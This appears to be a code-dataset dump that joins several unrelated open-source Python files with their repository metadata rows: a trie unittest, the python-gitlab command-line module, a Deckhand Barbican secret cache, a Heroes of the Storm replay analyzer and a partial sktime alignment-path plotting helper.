self.assertEquals([(accept, ['0', '1', '2']),
(accept, ['0', '1', '2', '3']),
(accept, ['0', '1', '3']),
(accept, ['0', '1', '4']),
(accept, ['0', '1', '5'])],
accept_sequences)
def testTrieAddAndMerge(self):
uncompressed = self.MakeUncompressedTrie()
self.CheckTrieAccepts(trie.GetAllAcceptSequences(uncompressed))
# n0 -0-> n1 -1-> n2 -2-> n3 -3-> n4
# | -3-> n5
# | -4-> n6
# | -5-> n7
self.assertEquals(8, len(trie.GetAllUniqueNodes(uncompressed)))
node_cache = trie.NodeCache()
compressed_trie = node_cache.Merge(node_cache.empty_node, uncompressed)
self.CheckTrieAccepts(trie.GetAllAcceptSequences(compressed_trie))
# (n4, n5. n6, n7) can be grouped together from above
self.assertEquals(5, len(trie.GetAllUniqueNodes(compressed_trie)))
def testTrieSerializationAndDeserialization(self):
uncompressed = self.MakeUncompressedTrie()
node_cache = trie.NodeCache()
compressed_trie = node_cache.Merge(node_cache.empty_node, uncompressed)
reconstructed_trie = trie.TrieFromDict(trie.TrieToDict(compressed_trie),
node_cache)
self.CheckTrieAccepts(trie.GetAllAcceptSequences(reconstructed_trie))
self.assertEquals(5, len(trie.GetAllUniqueNodes(reconstructed_trie)))
def testTrieDiff(self):
trie1 = trie.Node()
trie2 = trie.Node()
accept1 = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
accept2 = trie.AcceptInfo(input_rr='%eax', output_rr='%ecx')
trie.AddToUncompressedTrie(trie1, ['0', '1', '2'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '3'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '4'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '5'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '2'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '3'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '4'], accept2)
node_cache = trie.NodeCache()
compressed_trie1 = node_cache.Merge(node_cache.empty_node, trie1)
compressed_trie2 = node_cache.Merge(node_cache.empty_node, trie2)
diffs = set()
compressed_diffs = set()
for diff in trie.DiffTries(trie1, trie2, node_cache.empty_node, ()):
diffs.add(diff)
for diff in trie.DiffTries(compressed_trie1, compressed_trie2,
node_cache.empty_node, ()):
compressed_diffs.add(diff)
self.assertEquals(
diffs,
set([(('0', '1', '4'), accept1, accept2),
(('0', '1', '5'), accept1, None)]))
self.assertEquals(diffs, compressed_diffs)
if __name__ == '__main__':
unittest.main()
| 39.351064 | 76 | 0.634496 | 3,430 | 0.927278 | 0 | 0 | 0 | 0 | 0 | 0 | 593 | 0.160314 |
d356d162a88ba630ab5c48261a45a43472939810 | 6,074 | py | Python | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | null | null | null | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | 6 | 2020-12-17T09:37:03.000Z | 2020-12-18T04:42:23.000Z | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Gauvain Pocentek <gauvain@pocentek.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import functools
import importlib
import re
import sys
import gitlab.config
camel_re = re.compile("(.)([A-Z])")
# custom_actions = {
# cls: {
# action: (mandatory_args, optional_args, in_obj),
# },
# }
custom_actions = {}
def register_custom_action(cls_names, mandatory=tuple(), optional=tuple()):
def wrap(f):
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
return f(*args, **kwargs)
# in_obj defines whether the method belongs to the obj or the manager
in_obj = True
classes = cls_names
if type(cls_names) != tuple:
classes = (cls_names,)
for cls_name in classes:
final_name = cls_name
if cls_name.endswith("Manager"):
final_name = cls_name.replace("Manager", "")
in_obj = False
if final_name not in custom_actions:
custom_actions[final_name] = {}
action = f.__name__.replace("_", "-")
custom_actions[final_name][action] = (mandatory, optional, in_obj)
return wrapped_f
return wrap
def die(msg, e=None):
if e:
msg = "%s (%s)" % (msg, e)
sys.stderr.write(msg + "\n")
sys.exit(1)
def what_to_cls(what):
return "".join([s.capitalize() for s in what.split("-")])
def cls_to_what(cls):
return camel_re.sub(r"\1-\2", cls.__name__).lower()
def _get_base_parser(add_help=True):
parser = argparse.ArgumentParser(
add_help=add_help, description="GitLab API Command Line Interface"
)
parser.add_argument("--version", help="Display the version.", action="store_true")
parser.add_argument(
"-v",
"--verbose",
"--fancy",
help="Verbose mode (legacy format only)",
action="store_true",
)
parser.add_argument(
"-d", "--debug", help="Debug mode (display HTTP requests)", action="store_true"
)
parser.add_argument(
"-c",
"--config-file",
action="append",
help="Configuration file to use. Can be used multiple times.",
)
parser.add_argument(
"-g",
"--gitlab",
help=(
"Which configuration section should "
"be used. If not defined, the default selection "
"will be used."
),
required=False,
)
parser.add_argument(
"-o",
"--output",
help="Output format (v4 only): json|legacy|yaml",
required=False,
choices=["json", "legacy", "yaml"],
default="legacy",
)
parser.add_argument(
"-f",
"--fields",
help=(
"Fields to display in the output (comma "
"separated). Not used with legacy output"
),
required=False,
)
return parser
def _get_parser(cli_module):
parser = _get_base_parser()
return cli_module.extend_parser(parser)
def _parse_value(v):
if isinstance(v, str) and v.startswith("@"):
# If the user-provided value starts with @, we try to read the file
# path provided after @ as the real value. Exit on any error.
try:
with open(v[1:]) as fl:
return fl.read()
except Exception as e:
sys.stderr.write("%s\n" % e)
sys.exit(1)
return v
def main():
if "--version" in sys.argv:
print(gitlab.__version__)
sys.exit(0)
parser = _get_base_parser(add_help=False)
# This first parsing step is used to find the gitlab config to use, and
# load the propermodule (v3 or v4) accordingly. At that point we don't have
# any subparser setup
(options, args) = parser.parse_known_args(sys.argv)
try:
config = gitlab.config.GitlabConfigParser(options.gitlab, options.config_file)
except gitlab.config.ConfigError as e:
if "--help" in sys.argv or "-h" in sys.argv:
parser.print_help()
sys.exit(0)
sys.exit(e)
cli_module = importlib.import_module("gitlab.v%s.cli" % config.api_version)
# Now we build the entire set of subcommands and do the complete parsing
parser = _get_parser(cli_module)
try:
import argcomplete
argcomplete.autocomplete(parser)
except Exception:
pass
args = parser.parse_args(sys.argv[1:])
config_files = args.config_file
gitlab_id = args.gitlab
verbose = args.verbose
output = args.output
fields = []
if args.fields:
fields = [x.strip() for x in args.fields.split(",")]
debug = args.debug
action = args.whaction
what = args.what
args = args.__dict__
# Remove CLI behavior-related args
for item in (
"gitlab",
"config_file",
"verbose",
"debug",
"what",
"whaction",
"version",
"output",
):
args.pop(item)
args = {k: _parse_value(v) for k, v in args.items() if v is not None}
try:
gl = gitlab.Gitlab.from_config(gitlab_id, config_files)
if gl.private_token or gl.oauth_token or gl.job_token:
gl.auth()
except Exception as e:
die(str(e))
if debug:
gl.enable_debug()
cli_module.run(gl, what, action, args, verbose, output, fields)
sys.exit(0)
| 27.484163 | 87 | 0.604873 | 0 | 0 | 0 | 0 | 97 | 0.01597 | 0 | 0 | 2,098 | 0.345407 |
d3570c21033a2353bb799d126f54e1f54457ff8f | 142 | py | Python | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | 1 | 2020-12-09T14:47:13.000Z | 2020-12-09T14:47:13.000Z | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | null | null | null | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
| 28.4 | 53 | 0.859155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d357eeb1047aa19ccfdf077b0d42dbce4b1b7b39 | 2,882 | py | Python | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 2 | 2019-05-24T08:36:25.000Z | 2019-05-31T17:40:19.000Z | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 1 | 2021-08-31T15:59:27.000Z | 2021-08-31T15:59:27.000Z | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 4 | 2019-09-19T18:00:54.000Z | 2021-07-19T05:03:18.000Z | # Copyright 2018 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
from oslo_log import log as logging
from deckhand.conf import config
CONF = config.CONF
LOG = logging.getLogger(__name__)
_CACHE_OPTS = {
'cache.type': 'memory',
'expire': CONF.barbican.cache_timeout,
}
_CACHE = CacheManager(**parse_cache_config_options(_CACHE_OPTS))
_BARBICAN_CACHE = _CACHE.get_cache('barbican_cache')
# NOTE(felipemonteiro): The functions below realize a lookup and reverse-lookup
# to allow for much faster retrieval of encrypted data from Barbican, which
# doesn't currently support batched requests in its Secrets API. This behavior
# is necessary since Deckhand has to potentially retrieve and store up to
# dozens of secrets per request. Note that data for both lookup functions
# below are invalidated together, as they are tied to the same cache.
def lookup_by_ref(barbicanclient, secret_ref):
"""Look up secret object using secret reference.
Allows for quick lookup of secret payloads using ``secret_ref`` via
caching.
"""
def do_lookup():
"""Returns secret object stored in Barbican."""
return barbicanclient.call("secrets.get", secret_ref)
if CONF.barbican.enable_cache:
return _BARBICAN_CACHE.get(key=secret_ref, createfunc=do_lookup)
else:
return do_lookup()
def lookup_by_payload(barbicanclient, **kwargs):
"""Look up secret reference using the secret payload.
Allows for quick lookup of secret references using ``secret_payload`` via
caching (essentially a reverse-lookup).
Useful for ensuring that documents with the same secret payload (which
occurs when the same document is recreated across different revisions)
persist the same secret reference in the database -- and thus quicker
future ``lookup_by_ref`` lookups.
"""
def do_lookup():
"""Returns secret Barbican reference."""
secret = barbicanclient.call("secrets.create", **kwargs)
return secret.store()
secret_payload = kwargs['payload']
if CONF.barbican.enable_cache:
return _BARBICAN_CACHE.get(key=secret_payload, createfunc=do_lookup)
else:
return do_lookup()
def invalidate():
_BARBICAN_CACHE.clear()
| 35.580247 | 79 | 0.743928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,811 | 0.628383 |
d359300d89c503491b179cf6b2e189a54cfed309 | 15,572 | py | Python | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | 31 | 2015-01-19T09:42:02.000Z | 2021-01-02T12:42:07.000Z | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | null | null | null | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | 9 | 2015-04-02T04:24:54.000Z | 2017-09-08T11:17:19.000Z | import os
import reader
import json
# todo: get this logger from elsewhere
from celery.utils.log import get_task_logger
log = get_task_logger(__name__)
# Default (key_path, analyzer_method_name) mappings consumed by
# StormReplayAnalyzer.analyze() when no explicit mapping list is supplied.
#
# key_path describes where the method's return value is written inside the
# result dict.  Path elements may be:
#   * a string     -> key of a nested dict (created on demand)
#   * an int       -> index of a nested list (grown with None padding)
#   * a list  []   -> fan-out marker: iterate the value, applying the rest
#                     of the path to each element (stored as a list)
#   * a dict {...} -> copy keys out of the value dict; a non-empty dict also
#                     renames keys (source_key -> target_key), an empty {}
#                     copies every key unchanged
defaultFieldMappings = [
    ### SET
    (['info','protocol'], 'getReplayProtocolVersion'),
    (['info','bytes'], 'getReplayFileByteSize'),
    (['info','gameloops'], 'getMatchLengthGameloops'),
    (['info','seconds'], 'getMatchLengthSeconds'),
    (['info','start_timestamp'], 'getMatchUTCTimestamp'),
    (['info','speed'], 'getMatchSpeed'),
    (['info','match_type'], 'getMatchType'),
    (['info','hero_selelection_mode'], 'getHeroSelectionMode'),
    (['map','name'], 'getMapName'),
    (['map',{'m_mapSizeX':'width', 'm_mapSizeY':'height'}], 'getGameDescription'),
    (['team', [], 'levels'], 'getTeamLevels'),
    #(['players', [], 'talents'], 'getTalents'),
    #(['players', [], 'talents', [], {'name':'name'}], 'getTalents'),
    #(['players', [], {'m_teamId': 'team', 'm_name': 'name', 'm_toonId': 'toon_id'}], 'getPlayers'),
    (['raw','players'], 'getPlayers'),
    (['raw','details'], 'getReplayDetails'),
    (['raw','init_data'], 'getReplayInitData'),
    #(['raw','translated_attributes_events'], 'getTranslatedReplayAttributesEvents'),
    #(['players', [], 'hero'], 'getPlayersHeroChoiceArray'),
]
# Individually selectable mapping groups, keyed by a public name.  Each value
# uses the same (key_path, analyzer_method_name) tuple format as
# defaultFieldMappings; clients request groups by name via
# StormReplayAnalyzer.getFieldMappingForNames().
named_field_mappings = {
    'RawReplayDetails': [(['raw','details'], 'getReplayDetails')],
    'RawReplayInitData': [(['raw','init_data'], 'getReplayInitData')],
    'RawReplayTrackerEvents': [(['raw','tracker_events'], 'getReplayTrackerEvents')],
    'RawReplayAttributesEvents': [(['raw','attributes_events'], 'getReplayAttributesEvents')],
    'RawReplayGameEvents': [(['raw','game_events'], 'getReplayGameEvents')],
    'RawReplayMessageEvents': [(['raw','message_events'], 'getReplayMessageEvents')],
    'RawTalentSelectionGameEvents': [(['raw','selections'], 'getTalentSelectionGameEvents')],
}
class StormReplayAnalyzer:
    """Derives match data (players, talents, levels, chat, ...) from a replay reader.

    NOTE: this module is written for Python 2 (uses `long`, `basestring`,
    `xrange`, `dict.has_key`).  Most getters cache their result on `self`
    via the try/except-AttributeError pattern.
    """

    @staticmethod
    def getAllFieldMappingNames():
        """Return the names of all predefined field mappings."""
        return named_field_mappings.keys()

    @staticmethod
    def getFieldMappingForNames(names):
        """Concatenate the field mappings registered under each name in *names*."""
        fieldMapping = []
        for name in names:
            fieldMapping = fieldMapping + named_field_mappings.get(name, [])
        return fieldMapping

    def __init__(self, reader):
        # reader: object exposing the getReplay* accessors used below.
        self.reader = reader

    def analyze(self, fieldMappings=None):
        """Run each mapped getter and assemble results into a nested dict.

        Each mapping is (keyPath, getterName).  keyPath entries may be:
        - a string: descend into (creating) a dict under that key,
        - a list: fan the value's elements out over list indices,
        - a dict: copy/rename keys from a dict-valued result ({} copies all).
        Uses an explicit worklist instead of recursion.
        """
        if fieldMappings is None:
            fieldMappings = defaultFieldMappings
        retval = {}
        for field in fieldMappings:
            value = getattr(self, field[1])()
            worklist = [(retval, field[0], value)]
            while len(worklist) > 0:
                workItem = worklist.pop()
                obj = workItem[0]
                keyPath = workItem[1]
                value = workItem[2]
                key = keyPath[0]
                isArray = isinstance(key, (int, long))
                if isArray and key >= len(obj):
                    # Grow the list so obj[key] is addressable.
                    obj.extend([None]*(key + 1 - len(obj)))
                if len(keyPath) == 1:
                    obj[key] = value
                elif isinstance(keyPath[1], basestring):
                    if isArray:
                        if obj[key] is None:
                            obj[key] = {}
                        obj = obj[key]
                    else:
                        obj = obj.setdefault(key, {})
                    worklist.append( (obj, keyPath[1:], value) )
                elif isinstance(keyPath[1], list):
                    if isArray:
                        if obj[key] is None:
                            obj[key] = []
                        obj = obj[key]
                    else:
                        obj = obj.setdefault(key, [])
                    for index, element in enumerate(value):
                        worklist.append( (obj, [index] + keyPath[2:], element) )
                elif isinstance(keyPath[1], dict):
                    if isArray:
                        if obj[key] is None:
                            obj[key] = {}
                        obj = obj[key]
                    else:
                        obj = obj.setdefault(key, {})
                    for dictKey in value:
                        if 0 == len(keyPath[1]):
                            # Empty dict spec: copy every key unchanged.
                            keyToWrite = dictKey
                        elif keyPath[1].has_key(dictKey):
                            keyToWrite = keyPath[1][dictKey]
                        else:
                            continue
                        worklist.append( (obj, [keyToWrite] + keyPath[2:], value[dictKey]) )
                else:
                    raise Exception('Key of invalid type: %s' % str(key))
        return retval

    def getReplayFileByteSize(self):
        return self.reader.getReplayFileByteSize()

    def getTalentSelectionGameEvents(self):
        """Return only the talent-tree-selection game events."""
        events = []
        for event in self.reader.getReplayGameEvents():
            if (event['_event'] != 'NNet.Game.SHeroTalentTreeSelectedEvent'):
                continue
            events.append(event)
        return events

    def getReplayProtocolVersion(self):
        return self.reader.getReplayProtocolVersion()

    def getReplayInitData(self):
        return self.reader.getReplayInitData()

    def getReplayAttributesEvents(self):
        return self.reader.getReplayAttributesEvents()

    def getReplayDetails(self):
        return self.reader.getReplayDetails()

    def getReplayTrackerEvents(self):
        return self.reader.getReplayTrackerEvents()

    def getReplayGameEvents(self):
        return self.reader.getReplayGameEvents()

    def getReplayMessageEvents(self):
        return self.reader.getReplayMessageEvents()

    def getTranslatedReplayAttributesEvents(self):
        """Attributes events translated via the version-specific talents module."""
        talentsReader = self.getTalentsReader()
        return talentsReader.translate_replay_attributes_events(self.getReplayAttributesEvents())

    def getGameDescription(self):
        initData = self.getReplayInitData()
        return initData['m_syncLobbyState']['m_gameDescription']

    def getGameSpeed(self):
        try:
            return self.gameSpeed
        except AttributeError:
            self.gameSpeed = 0
        return self.gameSpeed

    def getTalentsReader(self):
        """Import and cache the talents module matching the replay build number."""
        try:
            return self.talentsReader
        except AttributeError:
            replayVersion = self.reader.getReplayProtocolVersion()
            try:
                self.talentsReader = __import__('stormreplay.talents%s' % replayVersion, fromlist=['talents'])
            except ImportError:
                raise Exception('Unsupported StormReplay build number for talents: %i' % replayVersion)
        return self.talentsReader

    def getTalents(self):
        """Per-user list of talent picks, each with time/level/name/description."""
        try:
            return self.talents
        except AttributeError:
            self.talents = [[] for _ in xrange(10)]
            talentsReader = self.getTalentsReader()
            generator = talentsReader.decode_game_events_talent_choices(self.reader.getReplayGameEvents(), self.getPlayersHeroChoiceArray())
            for choice in generator:
                self.talents[choice['_userid']].append({
                    'seconds': self.gameloopToSeconds(choice['_gameloop']),
                    'level': choice['m_level'],
                    'name': choice['m_talentName'],
                    'description': choice['m_talentDescription'],
                    'index': choice['m_talentIndex'],
                })
        return self.talents

    def getTeamTalentTierTimes(self):
        """Per-team earliest/latest pick time and level for each talent tier."""
        try:
            return self.teamTalentTierTimes
        except AttributeError:
            teamTalentTierLevel = [[], []]
            teamTalentTiersFirstPick = [[], []]
            teamTalentTiersLastPick = [[], []]
            players = self.getPlayers()
            for playerIndex, playerTalentPicks in enumerate(self.getTalents()):
                player = players[playerIndex]
                for talentTierIndex, talentPick in enumerate(playerTalentPicks):
                    talentPickTime = talentPick['seconds']
                    teamIndex = player['m_teamId']
                    tiersFirstPick = teamTalentTiersFirstPick[teamIndex]
                    if (talentTierIndex >= len(tiersFirstPick)):
                        tiersFirstPick.append(talentPickTime)
                    elif (talentPickTime < tiersFirstPick[talentTierIndex]):
                        tiersFirstPick[talentTierIndex] = talentPickTime
                    tiersLastPick = teamTalentTiersLastPick[teamIndex]
                    if (talentTierIndex >= len(tiersLastPick)):
                        tiersLastPick.append(talentPickTime)
                    elif (talentPickTime > tiersLastPick[talentTierIndex]):
                        tiersLastPick[talentTierIndex] = talentPickTime
                    if (talentTierIndex >= len(teamTalentTierLevel[teamIndex])):
                        teamTalentTierLevel[teamIndex].append(talentPick['level'])
                    else:
                        teamTalentTierLevel[teamIndex][talentTierIndex] = talentPick['level']
            self.teamTalentTierTimes = [[], []]
            for teamIndex in xrange(2):
                for talentTierIndex, level in enumerate(teamTalentTierLevel[teamIndex]):
                    self.teamTalentTierTimes[teamIndex].append({
                        'earliest': teamTalentTiersFirstPick[teamIndex][talentTierIndex],
                        'latest': teamTalentTiersLastPick[teamIndex][talentTierIndex],
                        'level': level,
                    })
        return self.teamTalentTierTimes

    def getTeamLevels(self):
        """Per-team per-level timing, interpolated linearly between talent tiers."""
        try:
            return self.teamLevels
        except AttributeError:
            teamTalentTierTimes = self.getTeamTalentTierTimes()
            self.teamLevels = [[], []]
            for teamIndex in xrange(2):
                talentTierTimes = teamTalentTierTimes[teamIndex]
                levelTimes = [0] * talentTierTimes[-1]['level']
                for firstTier, nextTier in zip(talentTierTimes, talentTierTimes[1:]):
                    levelRange = nextTier['level'] - firstTier['level']
                    for level in xrange(firstTier['level'], nextTier['level']+1):
                        levelIndex = level-1
                        # Linear interpolation between the two tiers' earliest picks.
                        lerp = float(level - firstTier['level']) / levelRange
                        time = lerp * (nextTier['earliest'] - firstTier['earliest']) + firstTier['earliest']
                        levelTimes[levelIndex] = time
                levelToTalentTierInfo = {}
                for tierInfo in talentTierTimes:
                    levelToTalentTierInfo[str(tierInfo['level'])] = tierInfo
                for levelIndex, time in enumerate(levelTimes):
                    level = levelIndex + 1
                    levelInfo = {
                        'level': levelIndex + 1,
                        'seconds': time,
                        'is_talent_tier': False,
                    }
                    if levelToTalentTierInfo.has_key(str(level)):
                        tierInfo = levelToTalentTierInfo[str(level)]
                        levelInfo['is_talent_tier'] = True
                        levelInfo['earliest_talent_picked_time'] = tierInfo['earliest']
                        levelInfo['latest_talent_picked_time'] = tierInfo['latest']
                    self.teamLevels[teamIndex].append(levelInfo)
        return self.teamLevels

    def getMapName(self):
        try:
            return self.mapName
        except AttributeError:
            self.mapName = self.reader.getReplayDetails()['m_title']['utf8']
        return self.mapName

    def getPlayersHeroChoiceArray(self):
        """Array (indexed by user ID) of chosen hero unit-type names."""
        try:
            return self.playersHeroArray
        except AttributeError:
            self.playersHeroArray = [None] * 10
            for i, player in enumerate(self.getPlayerSpawnInfo()):
                self.playersHeroArray[i] = player['hero']
        return self.playersHeroArray

    # returns array indexed by user ID
    def getPlayers(self):
        try:
            return self.players
        except AttributeError:
            self.players = [None] * 10
            for i, player in enumerate(self.getReplayDetails()['m_playerList']):
                #TODO: confirm that m_workingSetSlotId == i always
                toon = player['m_toon']
                player['m_toonId'] = "%i-%s-%i-%i" % (toon['m_region'], toon['m_programId'], toon['m_realm'], toon['m_id'])
                player['m_name'] = player['m_name']['utf8']
                player['m_controlPlayerId'] = i+1
                self.players[i] = player
        return self.players

    # returns array indexed by user ID
    def getPlayerSpawnInfo(self):
        """Map each user to their spawned hero unit (from tracker events)."""
        try:
            return self.playerSpawnInfo
        except AttributeError:
            self.playerSpawnInfo = [None] * 10
            playerIdToUserId = {}
            for event in self.getReplayTrackerEvents():
                if event['_event'] == 'NNet.Replay.Tracker.SPlayerSetupEvent':
                    playerIdToUserId[event['m_playerId']] = event['m_userId']
                elif event['_event'] == 'NNet.Replay.Tracker.SUnitBornEvent' and (int(event['_gameloop']) > 0):
                    playerId = event['m_controlPlayerId']
                    if (playerIdToUserId.has_key(playerId)):
                        playerIndex = playerIdToUserId[playerId] # always playerId-1 so far, but this is safer
                        self.playerSpawnInfo[playerIndex] = {
                            'hero': event['m_unitTypeName']['utf8'],
                            'unit_tag': event['m_unitTag']
                        }
                        del playerIdToUserId[playerId]
                        if len(playerIdToUserId) == 0:
                            break
        return self.playerSpawnInfo

    def getMatchSpeed(self):
        attributes = self.getTranslatedReplayAttributesEvents()
        return attributes[16]['m_gameSpeed']

    def getMatchType(self):
        attributes = self.getTranslatedReplayAttributesEvents()
        return attributes[16]['m_gameType']

    def getHeroSelectionMode(self):
        attributes = self.getTranslatedReplayAttributesEvents()
        return attributes[16]['m_heroSelectionMode']

    def getMatchUTCTimestamp(self):
        try:
            return self.utcTimestamp
        except AttributeError:
            # m_timeUTC is a Windows FILETIME (100ns ticks since 1601-01-01);
            # convert to a Unix epoch timestamp.
            self.utcTimestamp = (self.getReplayDetails()['m_timeUTC'] / 10000000) - 11644473600
        return self.utcTimestamp

    def getMatchLengthGameloops(self):
        lastEvent = self.getReplayTrackerEvents()[-1]
        return lastEvent['_gameloop']

    def getMatchLengthSeconds(self):
        return self.gameloopToSeconds(self.getMatchLengthGameloops())

    def gameloopToSeconds(self, gameloop):
        # The game simulation runs at 16 gameloops per second.
        return gameloop / 16.0

    def gameloopToTimestamp(self, gameloop):
        # BUG FIX: was `_gameloop`, an undefined name (NameError at runtime).
        return self.getMatchUTCTimestamp() + gameloop / 16.0

    def getChat(self):
        """List of chat messages with timestamp, sender user ID and text."""
        try:
            return self.chat
        except AttributeError:
            self.chat = []
            for messageEvent in self.getReplayMessageEvents():
                if (messageEvent['_event'] != 'NNet.Game.SChatMessage'):
                    continue
                userId = messageEvent['_userid']['m_userId']
                chatData = {
                    't': self.gameloopToTimestamp(messageEvent['_gameloop']),
                    'user': userId,
                    'msg': messageEvent['m_string']['utf8'],
                }
                self.chat.append(chatData)
        return self.chat
| 40.978947 | 140 | 0.56075 | 13,636 | 0.875674 | 0 | 0 | 302 | 0.019394 | 0 | 0 | 2,603 | 0.167159 |
d35a053d65915bab9a6060e5f2a46eeac4fd7b25 | 6,214 | py | Python | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import matplotlib.colors as colorplt
import matplotlib.pyplot as plt
import numpy as np
from sktime.distances._distance import distance_alignment_path, pairwise_distance
gray_cmap = colorplt.LinearSegmentedColormap.from_list("", ["#c9cacb", "white"])
def _path_mask(cost_matrix, path, ax, theme=gray_cmap):
    """Render *cost_matrix* on *ax*, highlighting cells that lie on *path*.

    Path cells are drawn white, unreachable (inf) cells darkest, all other
    cells in an intermediate shade; every cell is annotated with its cost.
    """
    plot_matrix = np.zeros_like(cost_matrix)
    max_size = max(cost_matrix.shape)
    for i in range(max_size):
        for j in range(max_size):
            if (i, j) in path:
                plot_matrix[i, j] = 1.0
            elif cost_matrix[i, j] == np.inf:
                plot_matrix[i, j] = 0.0
            else:
                plot_matrix[i, j] = 0.25

    for i in range(max_size):
        for j in range(max_size):
            # matshow puts row j on the y-axis, hence the transposed lookup.
            c = cost_matrix[j, i]
            # BUG FIX: this annotation was drawn twice (duplicated line);
            # drawing each label once is sufficient.
            ax.text(i, j, str(round(c, 2)), va="center", ha="center", size=10)

    ax.matshow(plot_matrix, cmap=theme)
def _pairwise_path(x, y, metric):
    """Fallback 'alignment': the diagonal of the pairwise distance matrix.

    Returns (path, distance, matrix) where the path pairs index i with i and
    the distance is the matrix trace.
    """
    pw_matrix = pairwise_distance(x, y, metric=metric)
    diagonal_len = min(pw_matrix.shape)
    path = [(i, i) for i in range(diagonal_len)]
    return path, pw_matrix.trace(), pw_matrix
def _plot_path(
    x: np.ndarray,
    y: np.ndarray,
    metric: str,
    dist_kwargs: dict = None,
    title: str = "",
    plot_over_pw: bool = False,
):
    """Plot the alignment path of *metric* between series *x* and *y*.

    Draws the cost matrix in the centre with the two series along the left
    and top edges.  Metrics without a native alignment path fall back to
    the pairwise diagonal.  Returns the matplotlib ``plt`` module so the
    caller can save or clear the figure.
    """
    if dist_kwargs is None:
        dist_kwargs = {}
    try:
        path, dist, cost_matrix = distance_alignment_path(
            x, y, metric=metric, return_cost_matrix=True, **dist_kwargs
        )
        if metric == "lcss":
            # lcss cost matrices carry a padding row/column, so shift the
            # path indices by one.  NOTE: the generator variable shadows
            # the outer `x` series here (works, but easy to misread).
            _path = []
            for tup in path:
                _path.append(tuple(x + 1 for x in tup))
            path = _path
        if plot_over_pw is True:
            # Optionally display the path over a plain pairwise-distance
            # matrix instead of the metric's own cost matrix.
            if metric == "lcss":
                pw = pairwise_distance(x, y, metric="euclidean")
                cost_matrix = np.zeros_like(cost_matrix)
                cost_matrix[1:, 1:] = pw
            else:
                pw = pairwise_distance(x, y, metric="squared")
                cost_matrix = pw
    except NotImplementedError:
        path, dist, cost_matrix = _pairwise_path(x, y, metric)

    plt.figure(1, figsize=(8, 8))
    x_size = x.shape[0]

    # definitions for the axes
    left, bottom = 0.01, 0.1
    w_ts = h_ts = 0.2
    left_h = left + w_ts + 0.02
    width = height = 0.65
    bottom_h = bottom + height + 0.02

    rect_s_y = [left, bottom, w_ts, height]
    rect_gram = [left_h, bottom, width, height]
    rect_s_x = [left_h, bottom_h, width, h_ts]

    ax_gram = plt.axes(rect_gram)
    ax_s_x = plt.axes(rect_s_x)
    ax_s_y = plt.axes(rect_s_y)

    _path_mask(cost_matrix, path, ax_gram)
    ax_gram.axis("off")
    ax_gram.autoscale(False)
    # ax_gram.plot([j for (i, j) in path], [i for (i, j) in path], "w-",
    # linewidth=3.)

